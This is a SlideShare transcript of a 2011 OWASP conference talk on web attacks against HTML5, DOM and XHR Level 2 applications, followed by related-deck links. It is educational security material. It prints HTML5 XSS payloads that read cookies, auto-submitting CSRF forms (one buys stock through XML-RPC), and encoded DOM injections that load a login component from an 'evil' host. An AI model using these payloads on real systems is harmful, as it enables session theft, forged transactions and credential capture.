SlideShare a Scribd company logo

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

Shreeraj Shah
Shreeraj Shah

Browsers are escalating their feature set to accommodate new specifications like HTML 5, XHR Level 2 and DOM Level 3. It is forming the backbone of next generation applications running on mobile, PDA devices or desktops. The blend of DOM (Remote Execution stack) , XHR L2 (Sockets for injections) and HTML5 (Exploit delivery platform) is becoming an easy victim for attackers and worms. We have already witnessed these types of attacks on popular sites like Twitter, Facebook and Yahoo. It is of the essence to understand attack surface and vectors to protect next generation applications. We have an enormous expansion of attack surface after inclusion of features like audio/video tags, drag/drop APIs, CSS-Opacity, localstorage, web workers, DOM selectors, Mouse gesturing, native JSON, Cross Site access controls, offline browsing, etc. This extension of attack surface and exposure of server side APIs allow attacker to perform following lethal attacks and abuses. XHR abuse with attacking Cross Site access controls using level 2 calls JSON manipulations and poisoning DOM API injections and script executions Abusing HTML5 tag structure and attributes Localstorage manipulation and foreign site access Attacking client side sandbox architectures DOM scrubbing and logical abuse Browser hijacking and exploitation through advanced DOM features One-way CSRF and abusing vulnerable sites DOM event injections and controlling (Clickjacking) Hacking widgets, mashups and social networking sites Abusing client side Web 2.0 and RIA libraries We will be covering the above attacks and their variants in detail along with some real life cases and demonstrations. It is also important to understand methods of discovering these types of vulnerabilities across the application base. We will see some new scanning tools and approaches to identify some of these key issues.

Technology
1 of 66
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP 22nd Sept. 2011 OWASP AppSec USA 2011 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
http://shreeraj.blogspot.com shreeraj@blueinfy.com Who Am I? http://www.blueinfy.com Founder & Director Blueinfy Solutions Pvt. Ltd. SecurityExposure.com Past experience Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest Web security research Published research Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories - .Net, Java servers etc. Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author) Web 2.0 Security – Defending Ajax, RIA and SOA Hacking Web Services Web Hacking OWASP 2
Agenda Next Generation Application’s Attack Surface and Threat Model HTML 5 – Tags, Storage & WebSQL DOM – Vulnerabilities & Exploits Abusing Sockets, XHR & CSRF ClickJacking & Exploting Rich HTML Components Reverse Engineering across DOM OWASP 3
ATTACK SURFACE AND THREAT MODEL OWASP 4
Real Life Cases Last three years – several application reviewed (Banking, Trading, Portals, Web 2.0 sites etc…) Interesting outcomes and stats Auto scanning is becoming increasingly difficult and impossible in some cases Sites are vulnerable and easily exploitable in many cases OWASP 5
Technology Shift & Trend • Android • iPhone/Pad • HTML 5 Other • • Storage • Flash Mobile • AMF • WebSocket • DOM • WebSQL • JS • Storage• Flex • XHR • XAML Server side Components • Silverlight • WCF Presentation Layer • NET Business Layer Client side Data Access Layer Components Authentication (Browser) Communication etc. Runtime, Platform, Operating System Components OWASP 6
Browser Model Mobile HTML5 Silverlight Flash Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Storage XHR WebSocket Plug-in Sockets Browser Native Network Services Network & Access Same Origin Policy (SOP) Sandbox Core Policies OWASP 7 7
Layers Presentation HTML5 Silverlight Flash/Flex Process & Logic JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc. Network & Access XHR – Level 2 WebSockets Plugin-Sockets Core Policies SOP Sandboxing for iframe Shared Resources OWASP 8
Application Architecture Trading Weather Ajax Email RIA (Flash) Banking HTML / JS / DOM End Client Browser Blog Stack Internet Internet Web Services Web Server Data-access Application Server Database Auth. Access Authentication Server OWASP 9
Attack Surface Expansion JSON/XML streams POST name HTTP Response and value pairs variables XML/JSON QueryString etc. Ajax RIA (Flash) HTTP variables Cookie etc. DOM calls/events HTML / JS / DOM File attachments uploads etc. API - streams Open APIs and Feeds and other integrated streams party information OWASP 1 10 0
AppSec dynamics Source - OWASP OWASP 11 11
Integration and Communications DOM glues everything – It integrates Flex, Silverlight and HTML if needed Various ways to communicate – native browser way, using XHR and WebSockets Options for data sharing – JSON, XML, WCF, AMF etc. (many more) Browsers are supporting new set of technologies and exposing the surface OWASP 12
Demos App using DOM, AJAX and Web Services HTML 5 components and usage Fingerprinting Application Assets from DOM or JavaScripts Frameworks, Scripts, Structures, and so on – DWR/Struts OWASP 13
Threat Model Sandbox attacks 7 1 XSS abuse with 8 Abusing new features and ClickJacking tags and attributes like drag-and-drop Events Tags & Attributes Thick Features Presentation Injecting and Exploiting WebSQL WebSQL DOM Storage 4 3 Stealing from 2 DOM based XSS the storage Parser/Threads Process & Logic and Redirects 5 XHR WebSocket Plug-in Sockets Abusing network Network API and Sockets Browser Native Network Services & Access CSRF 6 Core across streams Same Origin Policy (SOP) Sandbox Policies 9 Threats to widgets Botnet/Spynet using 10 OWASP WebWorkers 14 and mashups
Mapping top 10 – Current Context A1 – Injection: JSON, AMF, WCF, XML Injection along with WebSQL. A2 – XSS : DOM based XSS, Script injection through , Direct third party streams, HTML5 tags A3 – Broken Authentication and Session Management: Reverse Engineering Authentication/Authorization logic (JS, Flash or Silverlight) & LocalStorage A4 – Insecure Direct Object Referencing : Insecure Data Access Level calls from browser. A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and Sharing) A6 – Security Misconfiguration : Insecure browsers, poor policies, trust model A7 – Failure to restrict URL Access : Hidden URL and resource-fetching from reverse engineering A8 – Unvalidated Redirects : DOM-based redirects and spoofing A9 – Insecure Crypto Storage : Local storage inside browser and Global variables A10 – Insufficient Transport Layer Protection : Ajax and other calls going over non-SSL channels. Mobile 10 … OWASP 15
HTML 5 – TAGS, STORAGE & WEBSQL OWASP 1 16 6
Abusing HTML 5 Tags Various new tags and can be abused, may not be filtered or validated Media tags <video poster=javascript:alert(document.cookie)// <audio><source onerror="javascript:alert(document.cookie)"> Form tags <form><button formaction="javascript:alert(document.cookie)">foo <body oninput=alert(document.cookie)><input autofocus> OWASP 17
Attacking Storage HTML 5 is having local storage and can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 18
Attacking Storage It is possible to steal them through XSS or via JavaScript getItem and setItem calls XSS the box and scan through storage OWASP 19
DOM Storage Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 20
What is wrong? OWASP 21
By default its Global Here is the line of code temp = "login.do?user="+user+"&pwd="+pwd; xmlhttp.open("GET",temp,true); xmlhttp.onreadystatechange=function() OWASP 22
DOM stealing It is possible to get these variables and clear text information – user/pass Responses and tokens Business information XHR calls and HTTP request/responses Dummy XHR object injection Lot of possibilities for exploitation OWASP 23
Demo DOMTracer and profiling Accessing username and password OWASP 24
SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 25
SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 26
DOM – VULNERABILITIES & EXPLOITS OWASP 27
DOM Architecture OWASP 28
DOM Calls Ajax/Flash/Silverlight – Async Calls HTML / CSS / RIA Database / Resource JS / DOM XML / Middleware / Text XMLHttpRequest (XHR) Web Server Asynchronous over HTTP(S) OWASP 29
DOM Calls JSON XML JS-Script JS-Object JS-Array OWASP 30
DOM based XSS It is a sleeping giant in the Ajax applications Root cause DOM is already loaded Application is single page and DOM remains same New information coming needs to be injected in using various DOM calls like eval() Information is coming from untrusted sources OWASP 31
Example cases Various different way DOM based XSS can take place Example Simple DOM function using URL to process ajax calls Third party content going into existing DOM and call is not secure Ajax call from application, what if we make a direct call to the link – JSON may cause XSS OWASP 32
DOM based URL parsing Ajax applications are already loaded and developers may be using static function to pass arguments from URL For example hu = window.location.search.substring(1); Above parameter is going to following ajax function eval('getProduct('+ koko.toString()+')'); DOM based XSS OWASP 33
Demo Scanning with DOMScan Injecting payload in the call OWASP 34
Third Party Streaming Documents Attacker News Weather Mails Bank/Trade Browser Internet RSS feeds Ajax RIA (Flash/Silver) Internet App HTML / JS / DOM Blog Database Authentication Stream Application Infrastructure eval() Web Services End point XSS OWASP 35
Stream processing if (http.readyState == 4) { var response = http.responseText; var p = eval("(" + response + ")"); document.open(); document.write(p.firstName+"<br>"); document.write(p.lastName+"<br>"); document.write(p.phoneNumbers[0]); document.close(); OWASP 36
Polluting Streams XML/ JS-Object / JS-Array / JS-Script / JSON attacker 8008 proxy Web app DB Web Server Web app DB Web app Stream Web Client eval() XSS OWASP 37
Exploiting DOM calls document.write(…) document.writeln(…) document.body.innerHtml=… document.forms[0].action=… Example of vulnerable document.attachEvent(…) Calls document.create…(…) document.execCommand(…) document.body. … window.attachEvent(…) document.location=… document.location.hostname=… document.location.replace(…) document.location.assign(…) document.URL=… window.navigate(…) OWASP 38
Demo Sample call demo DOMScan to identify vulnerability OWASP 39
Direct Ajax Call Ajax function would be making a back-end call Back-end would be returning JSON stream or any other and get injected in DOM In some libraries their content type would allow them to get loaded in browser directly In that case bypassing DOM processing… OWASP 40
Demo DWR/JSON call – bypassing and direct stream access OWASP 41
ABUSING SOCKETS, XHR & CSRF OWASP 42
Abusing network calls HTML 5 provides WebSocket and XHR Level 2 calls It allows to make cross domains call and raw socket capabilities It can be leveraged by JavaScript payload Malware or worm can use it to perform several scanning tasks OWASP 43
Internal Scanning Allows internal scanning, setting backward hidden channel, opening calls to proxy/cache. Some browsers have blocked these calls for security reason. OWASP 44
XHR/CSRF ETC. OWASP 45
XHR – Level 2 calls XHR is now level 2 on browser Various browser behavior is different XHR is already implemented Shared resource policy implemented “orgin” and “access-*” tags and decisions based on that Potential abuses One way stealth channel CSRF possible (no cookie though) Header changes CROS - http://www.w3.org/TR/cors/ (Cross Origin Request Sharing) OWASP 46
CSRF CSRF is possible with Web 2.0 streams by abusing DOM calls XML manipulations CSRF with JSON AMX is also XML stream Attacker injects simple HTML payload Initiate a request from browser to target cross domain OWASP 47
How it works? OWASP 48
JSON <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101/json/jservice.ashx" METHOD="POST"> <input type="hidden" name='{"id":3,"method":"getProduct","params":{ "id" : 3}}' value='foo'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 49
HTTP Req. POST /json/jservice.ashx HTTP/1.1 Host: 192.168.100.2 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Content-Type: text/plain Content-Length: 57 {"id":3,"method":"getProduct","params":{ "id" : 3}}=foo OWASP 50
HTTP Resp. HTTP/1.1 200 OK Date: Sat, 17 Jul 2010 09:14:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/plain; charset=utf-8 Content-Length: 1135 {"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image _path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic, sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}} OWASP 51
AMF <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101:8080/samples/messagebroker/http" METHOD="POST"> <input type="hidden" name='<amfx ver' value='"3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string ><string>clientId</string><string>correlationId</string><string>destination</strin g><string>headers</string><string>messageId</string><string>operation</string ><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null/><string/><string/><object><traits><string>DSId</string><str ing>DSMessagingVersion</string></traits><string>nil</string><int>1</int></obje ct><string>68AFD7CE-BFE2-4881-E6FD- 694A0148122B</string><int>5</int><int>0</int><int>0</int></object></body> </amfx>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 52
XML <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodN ame><params><param><value><string>MSFT</string></value> </param><param><value><double>26</double></value></para m></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 53
Demos Simple trade demo – XML-RPC call CSRF. OWASP 54
FLASHJACKING OWASP 55
Flashjacking It is possible to have some integrated attacks DOM based XSS CSRF Flash DOM based issue can change flash/swf file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.swf" OWASP 56
Double eval – eval the eval Payload - document.getElementsByName('Login').item(0 ).src='http://192.168.100.200:8080/flex/Login n/Loginn.swf‘ Converting for double eval to inject ‘ and “ etc… eval(String.fromCharCode(100,111,99,117,109,101,110,116,4 6,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97 ,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,10 9,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49 ,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,4 7,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103 ,105,110,110,46,115,119,102,39)) OWASP 57
silvelightjacking It is possible to have some integrated attacks DOM based XSS CSRF Silvelight files DOM based issue can change xap file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.xap" OWASP 58
RICH HTML COMPONENTS OWASP 59
Widgets Widgets/Gadgets/Modules – popular with Web 2.0 applications Small programs runs under browser JavaScript and HTML based components In some cases they share same DOM – Yes, same DOM It can cause a cross widget channels Exploitable … OWASP 60
Cross DOM Access Widget 1 Widget 2 Widget 3 Email Widget RSS Feed Reader Attacker DOM – Shared DOM Setting the trap OWASP 61
DOM traps It is possible to access DOM events, variables, logic etc. Sandbox is required at the architecture layer to protect cross widget access Segregating DOM by iframe may help Flash based widget is having its own issues as well Code analysis of widgets before allowing them to load OWASP 62
Demo Cross Widget Spying Using DOMScan to review Widget Architecture and Access Mechanism RSS Feed Hacking Mashup Hacks Cross Domain Callback Hacking OWASP 63
DEFENDING APPLICATIONS OWASP 64
Security at CODE Level JS, Flash or XAP should not have server side logic – should be presentation layer only … Obfuscation may help a bit – not full proof. Source code and object code analysis during blackbox testing would require Resource discoveries and fuzzing – a must for SOAP, JSON and AMF streams Careful with HTML 5 implementation DOM based scanning and analysis is required Cross streams and third party analytics OWASP 65
http://shreeraj.blogspot.com shreeraj@blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 66

Recommended

XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
Information Security and Ethical Hacking
Information Security and Ethical HackingInformation Security and Ethical Hacking
Information Security and Ethical HackingDivyank Jindal
 
Identity & Access Management Day 2022.pdf
Identity & Access Management Day 2022.pdfIdentity & Access Management Day 2022.pdf
Identity & Access Management Day 2022.pdfChinatu Uzuegbu
 
Dom based xss
Dom based xssDom based xss
Dom based xssLê Giáp
 
Phishing
PhishingPhishing
PhishingSaurabhKantSahu1
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hackingNandan Kushwaha
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SASTBlueinfy Solutions
 
You Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionYou Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionCrowdStrike
 

Recommended

XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
Information Security and Ethical Hacking
Information Security and Ethical HackingInformation Security and Ethical Hacking
Information Security and Ethical HackingDivyank Jindal
 
Identity & Access Management Day 2022.pdf
Identity & Access Management Day 2022.pdfIdentity & Access Management Day 2022.pdf
Identity & Access Management Day 2022.pdfChinatu Uzuegbu
 
Dom based xss
Dom based xssDom based xss
Dom based xssLê Giáp
 
Phishing
PhishingPhishing
PhishingSaurabhKantSahu1
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hackingNandan Kushwaha
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SASTBlueinfy Solutions
 
You Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionYou Can't Stop The Breach Without Prevention And Detection
You Can't Stop The Breach Without Prevention And DetectionCrowdStrike
 
Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
Realizing the Full Potential of Cloud-Native Application Security
Realizing the Full Potential of Cloud-Native Application SecurityRealizing the Full Potential of Cloud-Native Application Security
Realizing the Full Potential of Cloud-Native Application SecurityOry Segal
 
Data breach presentation
Data breach presentationData breach presentation
Data breach presentationBradford Bach
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 
Web vulnerabilities
Web vulnerabilitiesWeb vulnerabilities
Web vulnerabilitiesKrishna Gehlot
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
Different Types of Phishing Attacks
Different Types of Phishing AttacksDifferent Types of Phishing Attacks
Different Types of Phishing AttacksSysCloud
 
Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...
Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...
Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...Carlos Enrique Pajuelo Rojas
 
Angularjs Basics
Angularjs BasicsAngularjs Basics
Angularjs BasicsAnuradha Bandara
 
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...Valeri Karpov
 
AngularJS for designers and developers
AngularJS for designers and developersAngularJS for designers and developers
AngularJS for designers and developersKai Koenig
 
Dom selecting & jQuery
Dom selecting & jQueryDom selecting & jQuery
Dom selecting & jQueryKim Hunmin
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM ManipulationsYnon Perek
 
Introduction to the DOM
Introduction to the DOMIntroduction to the DOM
Introduction to the DOMtharaa abu ashour
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answersAnil Singh
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSSimon Guest
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tipsNir Kaufman
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedFITC
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS ConceptsKyle Hodgson
 
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 

More Related Content

What's hot

Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101Paul Ionescu
 
Realizing the Full Potential of Cloud-Native Application Security
Realizing the Full Potential of Cloud-Native Application SecurityRealizing the Full Potential of Cloud-Native Application Security
Realizing the Full Potential of Cloud-Native Application SecurityOry Segal
 
Data breach presentation
Data breach presentationData breach presentation
Data breach presentationBradford Bach
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
Different Types of Phishing Attacks
Different Types of Phishing AttacksDifferent Types of Phishing Attacks
Different Types of Phishing AttacksSysCloud
 
Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...
Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...
Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...Carlos Enrique Pajuelo Rojas
 

What's hot (8)

Security Code Review 101
Security Code Review 101Security Code Review 101
Security Code Review 101
 
Realizing the Full Potential of Cloud-Native Application Security
Realizing the Full Potential of Cloud-Native Application SecurityRealizing the Full Potential of Cloud-Native Application Security
Realizing the Full Potential of Cloud-Native Application Security
 
Data breach presentation
Data breach presentationData breach presentation
Data breach presentation
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
 
Web vulnerabilities
Web vulnerabilitiesWeb vulnerabilities
Web vulnerabilities
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
Different Types of Phishing Attacks
Different Types of Phishing AttacksDifferent Types of Phishing Attacks
Different Types of Phishing Attacks
 
Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...
Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...
Auditoria del primer componente en un Sistema de Gestión de Seguridad Patrimo...
 

Viewers also liked

MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...Valeri Karpov
 
AngularJS for designers and developers
AngularJS for designers and developersAngularJS for designers and developers
AngularJS for designers and developersKai Koenig
 
Dom selecting & jQuery
Dom selecting & jQueryDom selecting & jQuery
Dom selecting & jQueryKim Hunmin
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM ManipulationsYnon Perek
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answersAnil Singh
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSSimon Guest
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tipsNir Kaufman
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedFITC
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS ConceptsKyle Hodgson
 

Viewers also liked (12)

Angularjs Basics
Angularjs BasicsAngularjs Basics
Angularjs Basics
 
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
 
AngularJS for designers and developers
AngularJS for designers and developersAngularJS for designers and developers
AngularJS for designers and developers
 
Dom selecting & jQuery
Dom selecting & jQueryDom selecting & jQuery
Dom selecting & jQuery
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM Manipulations
 
Introduction to the DOM
Introduction to the DOMIntroduction to the DOM
Introduction to the DOM
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answers
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JS
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tips
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know Existed
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS Concepts
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shahFind me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shahowaspindia
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007ClubHack
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web appsJames Pearce
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsJames Pearce
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1James Pearce
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5James Pearce
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionJames Pearce
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2guest66dc5f
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web appsJames Pearce
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworksukdpe
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT ProfileHelen
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT ProfileHelen
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profilemoseskhedi
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profileelenarys
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsJames Pearce
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
HTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applicationsHTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applicationsJames Pearce
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) (20)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
